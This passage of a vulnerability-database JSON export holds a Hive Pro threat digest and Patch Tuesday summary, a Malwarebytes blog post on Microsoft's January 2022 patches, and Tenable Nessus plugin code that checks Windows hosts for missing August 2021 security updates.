https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-20T15:30:50", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. Microsoft has fixed 97 vulnerabilities, with nine classified as Critical and 88 as Important and among them 6 zero-days. Following are the type of security vulnerabilities reported in multiple Microsoft products: 41 Elevation of Privilege Vulnerabilities 29 Remote Code Execution Vulnerabilities 9 Security Feature Bypass Vulnerabilities 6 Information Disclosure Vulnerabilities 9 Denial of Service Vulnerabilities 3 Spoofing Vulnerabilities Six zero-day vulnerabilities were addressed in the January\u2019s patch Tuesday: CVE-2021-22947: Remote Code-Execution vulnerability in open-source Curl library. CVE-2021-36976: Remote Code-Execution vulnerability in open-source Libarchive. CVE-2022-21874: Remote Code-Execution vulnerability in Local Windows Security Center API. CVE-2022-21919: Privilege escalation vulnerability in Windows User Profile Service. CVE-2022-21839: Denial-of-Service vulnerability in Windows Event Tracing Discretionary Access Control List. CVE-2022-21836: Spoofing vulnerability in Windows Certificate. Some of the critical vulnerabilities are listed below: CVE-2022-21846: Remote Code-Execution vulnerability in Microsoft exchange server which. CVE-2022-21840: Remote Code-Execution vulnerability in Microsoft Office 365. CVE-2022-21857: Active Directory Domain Services Elevation of Privilege Vulnerability CVE-2022-21898: Privilege escalation vulnerability in DirectX Graphics. CVE-2022-21912: DirectX Graphics Kernel Remote Code Execution Vulnerability. CVE-2022-21907: HTTP Protocol Stack Remote Code-Execution Vulnerability CVE-2022-21917: HEVC Video Extensions Remote Code-Execution Vulnerability. Out of the critical bugs, a Remote Code-Execution (CVE-2022-21907) issue in the HTTP protocol stack (HTTP.sys) used as a protocol listener for processing HTTP requests by the Windows Internet Information Services (IIS) web server. Successful exploitation requires an attacker to send maliciously crafted packets to targeted Windows servers, which use the vulnerable HTTP Protocol Stack for processing packets. Hive Pro threat researchers recommend users to prioritize patching this flaw on all the affected servers since it could allow unauthenticated attackers to remotely execute arbitrary code in low complexity attacks and &quot;in most situations,&quot; without requiring user interaction. Vulnerabiliy Details Patch Links https://msrc.microsoft.com/update-guide/ References https://www.bleepingcomputer.com/microsoft-patch-tuesday-reports/Jan-2022.html https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/ https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/ https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/ https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T07:30:07", "type": "hivepro", "title": "Microsoft Patch Tuesday fixes critical zero-days along with 97 other flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21857", "CVE-2022-21874", "CVE-2022-21898", "CVE-2022-21907", "CVE-2022-21912", "CVE-2022-21917", "CVE-2022-21919"], "modified": "2022-01-12T07:30:07", "id": "HIVEPRO:C224B728F67C8D1703A8BF2411600695", "href": "https://www.hivepro.com/microsoft-patch-tuesday-fixes-critical-zero-days-along-with-97-other-flaws/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-01-18T21:32:10", "description": "How time flies sometimes. Microsoft yesterday released the first [patch Tuesday security updates of the year 2022](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan>). The update includes fixes for six zero-day vulnerabilities and a total of 97 bugs. This includes two Remote Code Execution (RCE) vulnerabilities affecting open source libraries. None of the zero-day flaws are known to have been exploited in the wild, but one of the other vulnerabilities is feared to be a wormable one.\n\nA [severe word ](<https://www.askwoody.com/newsletter/ms-defcon-1-business-patchers-be-on-alert/>)of warning for those running a network with a domain controller, the side effects this month are extreme. The advice is to hold of on the patch. Microsoft has a technology called Active Directory that allows workstations to authenticate with a \u201cdomain controller.\u201d This month\u2019s updates are causing such drastic issues with domain controllers that they can become stuck in a boot loop.\n\nPatches that can cause problems include the following:\n\n * [KB5009624](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009624-monthly-rollup-23f4910b-6bdd-475c-bb4d-c0e961aff0bc>) for Server 2012 R2\n * [KB5009595](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009595-security-only-update-060870c2-ad08-40e5-b000-a9f6d40c0831>) for Server 2012 R2\n * [KB5009546](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009546-os-build-14393-4886-0c2cac57-13b6-42e6-b318-41ca32428f91>) for Server 2016\n * [KB5009557](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009557-os-build-17763-2452-c3ee4073-1e7f-488b-86c9-d050672437ae>) for Server 2019\n\nIt\u2019s unclear if Server 2022 is similarly impacted.\n\nAlong with the update comes an [announcement](<https://msrc-blog.microsoft.com/2022/01/11/coming-soon-new-security-update-guide-notification-system/>) of a new security update guide notification system.\n\nLet\u2019s start by taking a closer look at the zero-days. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The first two we listed below have previously been fixed by a third party and are now being incorporated into Microsoft products.\n\n## Open Source Curl RCE vulnerability\n\n[CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>) is regarding a vulnerability in the curl open source library which is used by Windows. The January 2022 Windows Security Updates includes the most recent version of this library which addresses this vulnerability and others. The listed one can lead to a STARTTLS protocol injection via a Man-In-The-Middle attack.\n\nThe software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted. More specifically, when curl connects to an IMAP, POP3, SMTP or FTP server to exchange data securely using STARTTLS to upgrade the connection to TLS level, the server can still respond and send back multiple responses before the TLS upgrade. Such multiple pipelined responses are cached by curl. curl would then upgrade to TLS but not flush the in-queue of cached responses and instead use and trust the responses it got before the TLS handshake as if they were authenticated.\n\n## Libarchive RCE vulnerability\n\n[CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) is regarding a vulnerability in the libarchive open source library which is used by Windows. The January 2022 Windows Security Updates include the most recent version of this library which addresses the vulnerability and others. This vulnerability is described as libarchive 3.4.1 through 3.5.1 has a use-after-free in copy_string (called from do_uncompress_block and process_block).\n\n## Windows Certificate Spoofing vulnerability\n\n[CVE-2022-21836](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>) allows an attacker to bypass a security feature. A successful attacker could bypass the Windows Platform Binary Table (WPBT) verification by using a small number of compromised certificates. Microsoft has added those certificates to the Windows kernel driver block list, driver.stl. The Windows Platform Binary Table is a fixed firmware ACPI (Advanced Configuration and Power Interface) table. It was introduced by Microsoft to allow its vendors to execute programs every time a device boots. Certificates on the driver.stl will be blocked even if present in the WPBT.\n\n## Windows Event Tracing Discretionary Access Control List Denial of Service vulnerability\n\n[CVE-2022-21839](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>) does not provide us with a lot of details. Affected is some unknown processing of the component Event Tracing Discretionary Access Control List. The exploitability is said to be easy, and it is possible to launch the attack remotely. Required for exploitation is an authentication. A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or resource, making it inaccessible to its intended users.\n\n## Windows Security Center API RCE vulnerability\n\n[CVE-2022-21874](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>) is a publicly disclosed RCE vulnerability in the Windows Security Center API that received a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 7.8. This vulnerability requires user interaction to exploit, and the attack vector is local.\n\n## Windows User Profile Service Elevation of Privilege (EoP) vulnerability\n\n[CVE-2022-21919](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>) is a publicly disclosed EoP vulnerability in the Windows User Profile Service API that has received a CVSS score of 7.0. The exploitation is known to be difficult, but the attack may be initiated remotely. The requirement for exploitation is a simple authentication.\n\n## HTTP Protocol Stack RCE vulnerability\n\n[CVE-2022-21907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907>) is not one of the zero-days, but it stands out because it is a critical vulnerability which could allow an unauthenticated attacker to send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets. While this is a vulnerability that would mostly affect servers, the fact that it requires no user interaction, there are no privileges required and it targets an elevated service makes experts believe it is [wormable](<https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/>). There are also some [questions](<https://twitter.com/SecGuru_OTX/status/1481176886843686912>) among experts about which Windows versions are vulnerable.\n\n## The new security update guide notification system\n\nNotifications are sent when information is added or changed in the Security Update Guide. Based on feedback, Microsoft has been working to make signing up for and receiving Security Update Guide notifications easier. Starting today, you can sign up with any email address that you want and receive notifications at that email address. There is no longer a requirement that the email be a Live ID.\n\nTo start off, you will need to create a Security Update Guide profile by clicking \u201cSign in\u201d at the top right corner of the [Security Update Guide](<https://msrc.microsoft.com/update-guide>). You can use any email and password here. If this is your first time signing in, a validation email will be sent with steps to verify that you have entered a valid email address.\n\n## Other security updates\n\nDon&#x27;t forget to look at other security updates that you may need. We have seen updates from:\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-01-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035>)\n * [VMWare](<https://www.vmware.com/security/advisories/VMSA-2022-0001.html>)\n\n## Update January 18\n\nMicrosoft has released emergency out-of-band (OOB) updates to address multiple issues caused by Windows Updates issued during the January 2021 Patch Tuesday. For those that were experiencing problems or holding off on the updates, this update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount.\n\nStay safe, everyone!\n\nThe post [[updated] You can update now: Microsoft patches 97 bugs including 6 zero-days and a wormable one](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-microsoft-patches-97-bugs-including-6-zero-days-and-a-wormable-one/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T17:02:25", "type": "malwarebytes", "title": "[updated] You can update now: Microsoft patches 97 bugs including 6 zero-days and a wormable one", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21874", "CVE-2022-21907", "CVE-2022-21919"], "modified": "2022-01-12T17:02:25", "id": "MALWAREBYTES:DACEDE0F6B5888B6C6E281338C4B9980", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-microsoft-patches-97-bugs-including-6-zero-days-and-a-wormable-one/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005095 or cumulative update 5005090. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005095: Windows Server 2008 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005095.NASL", "href": "https://www.tenable.com/plugins/nessus/152425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152425);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005095\");\n script_xref(name:\"MSKB\", value:\"5005090\");\n script_xref(name:\"MSFT\", value:\"MS21-5005095\");\n script_xref(name:\"MSFT\", value:\"MS21-5005090\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005095: Windows Server 2008 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005095\nor cumulative update 5005090. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-36936, CVE-2021-36937,\n CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-36927)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005095-security-only-update-a324fdbb-ce90-4c4d-8d9d-e9f2f2a57e0e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de72daa6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005090-monthly-rollup-8feea9cd-25f9-41ef-b8e1-815211dc4e6c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?910509c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005095 or Cumulative Update KB5005090.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005095',\n '5005090'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005095, 5005090])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:06", "description": "The remote Windows host is missing security update 5005089 or cumulative update 5005088. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005089.NASL", "href": "https://www.tenable.com/plugins/nessus/152436", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152436);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n 